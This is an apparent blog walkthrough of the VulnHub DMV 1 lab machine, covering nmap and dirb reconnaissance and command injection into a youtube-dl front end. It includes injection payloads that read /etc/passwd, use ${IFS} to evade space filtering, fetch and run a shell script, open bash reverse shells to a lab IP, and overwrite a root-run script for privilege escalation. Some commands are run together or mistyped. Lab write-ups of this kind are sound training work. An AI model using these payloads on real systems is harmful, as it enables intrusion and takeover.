VulnHub: DMV 1

Reconnaissance

  1. Scan network
nmap -sn <ip range>

2. Scan for open ports

nmap -Pn <ip>

3. Scan for open ports with high port number

nmap -Pn -p- <ip>

4. Scan for service

nmap -sV <ip>

5. Scan for vulnerability

nmap --script vuln <ip>

6. Fuzzing directory

dirb http://<ip>

7. Try login to ssh

ssh <ip>

8. Access site

http://<ip>
http://<ip>/admin
http://<ip>/tmp/

Exploitation

  1. Seems like it’s youtube downloader

2. Let’s try some video

Paste Video ID

Error!!!

3. Let’s try again with other video

Still error!!!

4. Intercept with Burp Suite

Send to Repeater

Send the request, there’s an error in result

5. Let’s google the result
I came across to this link: https://github.com/ytdl-org/youtube-dl/issues/21057

Access project page, read the manual

6. Back to repeater, try some command

--exec`pwd`

Read passwd file

--exec`cat /etc/passwd`

Error!!!

Replace space with “${IFS}”

--exec`cat${IFS}/etc/passwd`

7. Reverse shell
Create listener

nc -lvp 1234

Try reverse shell command

Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

--exec`bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.0.2.8/1234${IFS}0>&1`

Failed!!!

Let’s try another way, I will upload reverse shell file to victim’s machine instead

Create python reverse shell and save it as “shell.sh”

Create HTTP Server

python -m SimpleHTTPServer <port no.>

Back to repeater

--exec`cd${IFS}/var/www/html/images/;wget{IFS}http://<attacker ip>:<attacker port>/shell.sh`
--exec`cd${IFS}/var/www/html/images/;bash${IFS}shell.sh`

Privilege Escalation

  1. First flag
cd admincat flag.txt

2. Get root access

cd /tmplscat clean.shecho 'bash -i >& /dev/tcp/10.0.2.8/1234 0>&1' > clean.sh

Back to attacker’s machine, we already have listener on port 1234.

Wait for a moment

Now, I have root shell

cd /rootls cat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store